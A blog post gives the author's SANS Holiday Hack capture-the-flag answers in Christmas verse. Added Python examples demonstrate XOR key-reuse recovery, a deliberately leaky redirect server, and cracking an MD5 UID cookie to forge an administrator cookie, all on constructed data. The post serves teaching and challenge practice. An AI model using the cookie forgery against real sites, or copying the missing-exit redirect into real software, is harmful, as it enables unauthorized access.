Now that the submission deadline has passed, I can share my answers to the SANS Holiday Hack that I wrote about last month.
Since there are awards for both best technical answer and best creative answer, I chose to go with creative. I still have a lot to learn in my budding InfoSec career, so I assumed I’d have no shot at writing up the best technical explanation. As a father of two young children, I’ve read a ton of Christmas stories recently so it seemed like a no-brainer to try and structure my answers like the holiday fairy tale the challenge was based on.
The questions were:
- Where did you find the remainder of Snow Miser’s Zone 1 URL?
- What is the key you used with steghide to extract Snow Miser’s Zone 2 URL? Where did you find the key?
- On Snow Miser’s Zone 3 page, why is using the same key multiple times a bad idea?
- What was the coding error in Zone 4 of Heat Miser’s site that allowed you to find the URL for Zone 5?
- How did you manipulate the cookie to get to Zone 5 of Heat Miser’s Control System?
- Please briefly describe the process, steps, and tools you used to conquer each zone, including all of the flags hidden in the comments of each zone page.
My answers (I’ve omitted the flags from question 6):
Snow Miser was careless with social media, a textbook case for Wikipedia.
A public tweet, his desk was shown. But in the pic his cover’s blown.
“The URL’s private!”, he may think…
But it’s inverted in his drink.
He was a fan of 90s white-boy rap, (though music lovers knew it was crap)
“IceIceBaby!” was the secret key, but he carelessly left it plain to see.
Just look in the Jay Pee Gee’s properties
To defeat his steganography.
The URL for snow-zone four was encrypted with a simple XOR
But the miser’s mistake, as you can see, was reusing a single key
“Zone four’s old string!!”, he must have cursed
Since the bitwise function can be reversed.
Heat Miser thinks he’s awfully sneaky, but his security model’s pretty leaky.
He thought zone four was locked down tight, but the redirect was not done right.
The location switch function wasn’t run until AFTER the page loading was done.
So anyone who inspects their traffic, can see the info in the packets.
A cookie protected the final site, much to a casual hacker’s delight
The label was clear, a UID. But how to guess the value correctly?
Aha! It’s just a simple hash, cracked as 1001 in a dash.
A common guess for the administrator…MD5 of 1 and see you later!
Christmas was in trouble again this year, but not from Martians or sickly reindeer
Santa was not quite feeling his best, he wanted to stay in and get some rest
But Mrs. Claus devised a way to ensure a normal Christmas Day.
It’s complicated to put it concisely, but there were two brothers not acting nicely.
They each intended to hack the other, both confident they were the smarter brother.
But now in trouble with their mama, there’s bound to be some Christmas drama.
So now I guess it’s up to me to get a present under every tree.
Hacking Snow Miser:
Zone zero, my journey had begun, seeking a clue for zone number one
Fortunately the address I need was right in snow miser’s twitter feed.
It seems that he carelessly acted, posting a picture that should have been redacted.
With the completed URL in tow, onward to zone one I go!
Here I found a little clue to break into zone number two.
The images on the page are the key…must be steganography!
To unlock the secret with Steghide, a password I must now provide,
Under the mat, look for the key…in this case, check the properties
The comments field, in plaintext, I find the words that I’ll use next
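Stepping out of verse for a moment: the steghide passphrase was sitting in the JPEG's comment field, which is ordinary metadata that any viewer or parser can read. The example below is added here and is not part of the original write-up or the challenge files. It walks the marker segments of a JPEG and pulls out every COM (0xFFFE) segment, which is where "Comment" lives in a plain JFIF file. The sample image is constructed inline (a minimal SOI / APP0 / COM / SOS / EOI skeleton with no real picture data) so the block runs offline; the comment text in it is only a stand-in for whatever the real image carried.

```python
import struct


def jpeg_comments(data: bytes) -> list:
    """Walk the marker segments of a JPEG and return every COM (0xFFFE) payload as text.

    Metadata segments (APPn, COM, DQT, ...) all precede the SOS marker (0xFFDA); the
    entropy-coded image data after SOS may contain 0xFF bytes that are not markers,
    so the walk stops there.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker: not a JPEG")
    pos, comments = 2, []
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker; skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):         # EOI or SOS: no more metadata segments
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # standalone markers carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])   # length includes its own 2 bytes
        payload = data[pos + 4:pos + 2 + length]
        if marker == 0xFE:                 # COM segment: free-form text, often NUL-terminated
            comments.append(payload.decode("latin-1").rstrip("\x00"))
        pos += 2 + length
    return comments


def build_sample_jpeg(comment: bytes) -> bytes:
    """Constructed stand-in for a real photo: SOI, a JFIF APP0 segment, one COM segment, SOS, EOI.
    There is no actual scan data; this only exercises the metadata walk."""
    def segment(marker: int, payload: bytes) -> bytes:
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\x01\x01\x00\x00\x3f\x00"     # one component, dummy spectral selection (constructed)
    return b"\xff\xd8" + segment(0xE0, app0) + segment(0xFE, comment) + segment(0xDA, sos) + b"\xff\xd9"


if __name__ == "__main__":
    sample = build_sample_jpeg(b"IceIceBaby!")   # constructed: the comment is our stand-in passphrase
    print(jpeg_comments(sample))
```

With a real file the same information is one command away (`exiftool -Comment photo.jpg`), and the recovered string is then the `-p` argument to `steghide extract -sf photo.jpg`. The caveat is the whole lesson: a COM segment is not hidden by steganography, it is plaintext metadata in the container, so anything stored there is readable by everyone who can download the image.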
Message decoded, I’m in zone two, what now do I have to do?
Back to Twitter once again, Heat Miser is now my friend
Luckily he happened to find a phone image his brother left behind
With that in hand, it’s easy to see the address for Snow Zone number three.
Now Snow Miser sets the score to break into snow zone number four
The address is given, but it’s encrypted. Left a critical error, so the key could be lifted.
He showed a different text and the cipher produced, and then the same key he simply reused
Getting the key was hardly a chore, he did nothing more than a bitwise XOR.
Key in hand, the cipher decoded, zone number four was finally loaded.
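The key-reuse point from question 3 deserves the arithmetic spelled out, so here is an added example that is not part of the original answers or the challenge: with a single XOR key, one known plaintext/ciphertext pair gives the key back (K = P XOR C), and that key then strips every other message encrypted under it. Even with no plaintext at all, XORing two ciphertexts cancels the key and leaves P1 XOR P2. The key and both URLs below are constructed for the demo (the `example.invalid` addresses are placeholders, not the real zone URLs).

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR; the result is as long as the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(known_plaintext: bytes, known_ciphertext: bytes) -> bytes:
    """C = P XOR K, so K = P XOR C: one known pair returns as much key as the pair is long."""
    if len(known_plaintext) != len(known_ciphertext):
        raise ValueError("known plaintext and ciphertext must be the same length")
    return xor_bytes(known_plaintext, known_ciphertext)


def decrypt_with_reused_key(keystream: bytes, ciphertext: bytes) -> bytes:
    """Undo the XOR on a second message encrypted under the same key.
    Only the bytes covered by the recovered keystream can be decrypted."""
    if len(ciphertext) > len(keystream):
        raise ValueError("recovered keystream (%d bytes) is shorter than the ciphertext (%d bytes)"
                         % (len(keystream), len(ciphertext)))
    return xor_bytes(ciphertext, keystream)


def plaintext_xor(c1: bytes, c2: bytes) -> bytes:
    """Without any plaintext at all: C1 XOR C2 == P1 XOR P2, the key cancels out."""
    return xor_bytes(c1, c2)


# Constructed demo data. The key is a deterministic stand-in for a secret; the URLs are placeholders.
DEMO_KEY = bytes((i * 73 + 17) % 256 for i in range(40))
DEMO_OLD_URL = b"http://example.invalid/zone-four-old"   # the "old string" shown next to its ciphertext
DEMO_NEW_URL = b"http://example.invalid/zone-four"       # the address we actually want


def demo() -> bytes:
    old_cipher = xor_bytes(DEMO_OLD_URL, DEMO_KEY)   # published alongside its plaintext
    new_cipher = xor_bytes(DEMO_NEW_URL, DEMO_KEY)   # the "encrypted" zone-four address
    keystream = recover_keystream(DEMO_OLD_URL, old_cipher)
    return decrypt_with_reused_key(keystream, new_cipher)


if __name__ == "__main__":
    print(demo())
```

The length check in `decrypt_with_reused_key` is the practical limit of the attack: you only learn as many key bytes as you have known plaintext, so a target longer than the known message stays partly unread unless the key repeats. A one-time pad is only secure while it is used exactly once; reuse turns it into this.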
The final zone was secured a bit wiser, I turned once more to my friend Heat Miser
He Tweeted a tip about a recent excursion, wherein Tim Medin exploits Subversion.
Snow Miser’s directories weren’t secured, and so his change database was quickly procured.
Following along with the directions from Tim, I got to the source code quick as the wind.
Now I could see how the zone had been locked, the hash generated was based off the clock.
Just set the right password at the right time, and suddenly zone five is totally mine.
Now I’ve achieved half my goal, I can disable the chillers at the North Pole
But to complete the task at hand, I’ll start turning the heat down in southern lands.
Hacking Heat Miser:
Now at the site of the hot-headed son, he gave out a clue to unlock heat zone one
It seems quite apparent that mister Heat Miser was having some trouble with Internet spiders
I just simply typed in robots dot text…can you guess what transpired next?
The address that I sought was there in plain sight! (and I thought that this hack might have taken all night)
From zone one to zone two didn’t get any harder, it seemed that Heat Miser was not getting smarter
True, in a comment the link wouldn’t show, but the HTML source still has it in tow
Right-click, show source…this security’s a joke! He could get hacked by a Jersey Shore jamoke.
The security problems seem to repeat, with another case of a careless tweet
Heat Miser’s screenshot brimmed with audacity, but he neglected to check on the window opacity.
Though it was blurry and borderline legible, I was able to tease out the right hexadecimal.
Now from zone three it was hardly a chore, since heat miser gives out the link to zone four.
His confidence shows with this info supplied, since a click on the link leads to “Access Denied”
He was mistaken to be quite so cocky, since his poor execution was defeated by proxy.
Loading up Fiddler, my traffic inspector, I found out that he was a bad redirector
The redirect function did not have an exit(), so I still got the data he thought he’d protected
The URL for the last zone was now out, I would surely save Christmas, I hadn’t a doubt.
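The zone-four bug (question 4) is a redirect that is issued but not followed by an exit, so the server keeps rendering the protected page into the body of the 302. A browser jumps to the Location and never shows that body; a proxy like Fiddler does. The block below is an added illustration, not the challenge site's code and not the language it was written in: a small Python HTTP server with a deliberately leaky `/leaky` path next to a `/fixed` path that returns right after the redirect headers, plus a client that refuses to follow redirects so it can read whatever came with the 302. The "protected" body and its `example.invalid` link are constructed.

```python
import http.server
import threading
import urllib.error
import urllib.request

# Constructed stand-in for the protected page; the real flag and URL are not reproduced here.
PROTECTED_BODY = b"<html><!-- next zone: http://example.invalid/zone-five --></html>"


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    """/leaky mirrors the bug: it sends a 302 and then keeps rendering the page anyway.
    /fixed returns right after the redirect headers, which is the whole fix."""

    def do_GET(self):
        if self.path not in ("/leaky", "/fixed"):
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(302)
        self.send_header("Location", "/denied")
        self.end_headers()
        if self.path == "/fixed":
            return                      # stop here; nothing below is sent
        # BUG (deliberate): the "access denied" redirect was set, but the handler
        # carries on, so the protected content goes out in the body of the 302.
        self.wfile.write(PROTECTED_BODY)

    def log_message(self, *args):
        pass                            # keep the demo quiet


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx so we can read the body a browser would have thrown away."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_without_following(url: str):
    """Return (status, body) of the first response, like a proxy that shows every hop."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:   # urllib reports the un-followed 302 as an error
        return err.code, err.read()


def run_demo() -> dict:
    """Start the server on a free localhost port, probe both paths, shut it down."""
    server = http.server.HTTPServer(("127.0.0.1", 0), RedirectHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        leaky = fetch_without_following(f"http://127.0.0.1:{port}/leaky")
        fixed = fetch_without_following(f"http://127.0.0.1:{port}/fixed")
    finally:
        server.shutdown()
        server.server_close()
    return {"leaky": leaky, "fixed": fixed}


if __name__ == "__main__":
    for name, (status, body) in run_demo().items():
        print(name, status, body)
```

No proxy is needed to spot this in the wild: `curl -si` does not follow redirects by default, so it prints the 302 headers and the body together. The fix is the one `/fixed` shows: stop generating output immediately after issuing the redirect, and treat the redirect as a convenience for the browser, never as the access control itself.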
Once again I saw Heat Miser’s page redirect me, unfortunately now he had done it correctly
Still looking at headers through Fiddler’s display, a cookie was set…that must be the way!
The value I saw was a UID string, but I hadn’t a clue what to do with the thing
Then…Inspiration! It hit like a flash. This length looks familiar, I think it’s a hash!
To an MD5 cracker I headed with glee, one thousand one was the recovered UID.
I assumed that the admin ID would be one, I was moments away from my task being done!
Now with the hash I thought would work best, I went back to Fiddler and changed my request
I had saved Christmas! I knew it was true! It returned two hundred and not three oh two.
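The cookie trick from question 5 in working form, as an added example rather than anything from the original answers or the site: the `UID` value is 32 hex characters, which is MD5's length; MD5 over small decimal integers finds the pre-image in a fraction of a second; and the same scheme lets you mint a cookie for whichever UID you guess the administrator has. The `Set-Cookie` line is constructed from `md5("1001")` so the block runs offline; it is not the real header the proxy showed.

```python
import hashlib
import re
from http.cookies import SimpleCookie

MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode("ascii")).hexdigest()


def looks_like_md5(value: str) -> bool:
    """32 hex characters is the length that 'looked familiar'."""
    return MD5_RE.match(value) is not None


def crack_numeric_md5(digest: str, limit: int = 100_000):
    """Try MD5 over small decimal integers, the search an online cracker wins instantly.
    Returns the matching integer as a string, or None if nothing below `limit` matches."""
    target = digest.lower()
    for n in range(limit):
        if md5_hex(str(n)) == target:
            return str(n)
    return None


def cookie_value(set_cookie_header: str, name: str) -> str:
    """Pull one cookie's value out of a Set-Cookie header as a proxy would display it."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    return jar[name].value


def forge_cookie_header(name: str, uid: str) -> str:
    """Build the Cookie request header that claims a different UID under the same scheme."""
    return f"{name}={md5_hex(uid)}"


def demo() -> dict:
    # Constructed Set-Cookie line standing in for the one seen in the proxy.
    set_cookie = "UID=" + md5_hex("1001") + "; path=/"
    observed = cookie_value(set_cookie, "UID")
    if not looks_like_md5(observed):
        raise ValueError("cookie value is not 32 hex characters")
    recovered = crack_numeric_md5(observed)         # "1001"
    forged = forge_cookie_header("UID", "1")        # guess: the administrator is user 1
    return {"observed": observed, "recovered": recovered, "forged": forged}


if __name__ == "__main__":
    print(demo())
```

The guess that the admin is UID 1 is only a guess until the replayed request comes back 200 instead of 302, which is exactly the confirmation the verse describes. The underlying flaw is an identifier that is both predictable and unauthenticated: a session token should be a random, server-stored value, not a hash of a small integer anyone can enumerate.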
And so, dear reader you might have one last query. Who am I, the hacker who kept Christmas cheery?
I’ll give you a hint, though you still might not guess…I can often be seen in a red and white dress.
Did you guess who I am? It’s me, Mrs. Claus! I can see that the answer has given you pause.
See, the Misers were prone to dropping the ball, so I picked up my phone and made a quick call
I signed up for SANS training classes from home (they never have anything closer than Nome)
With vLive instruction I now had the tools to break into both sites and embarrass those fools.
So now as I help Santa load up his sack, “Merry Christmas to all, and to all a good hack!”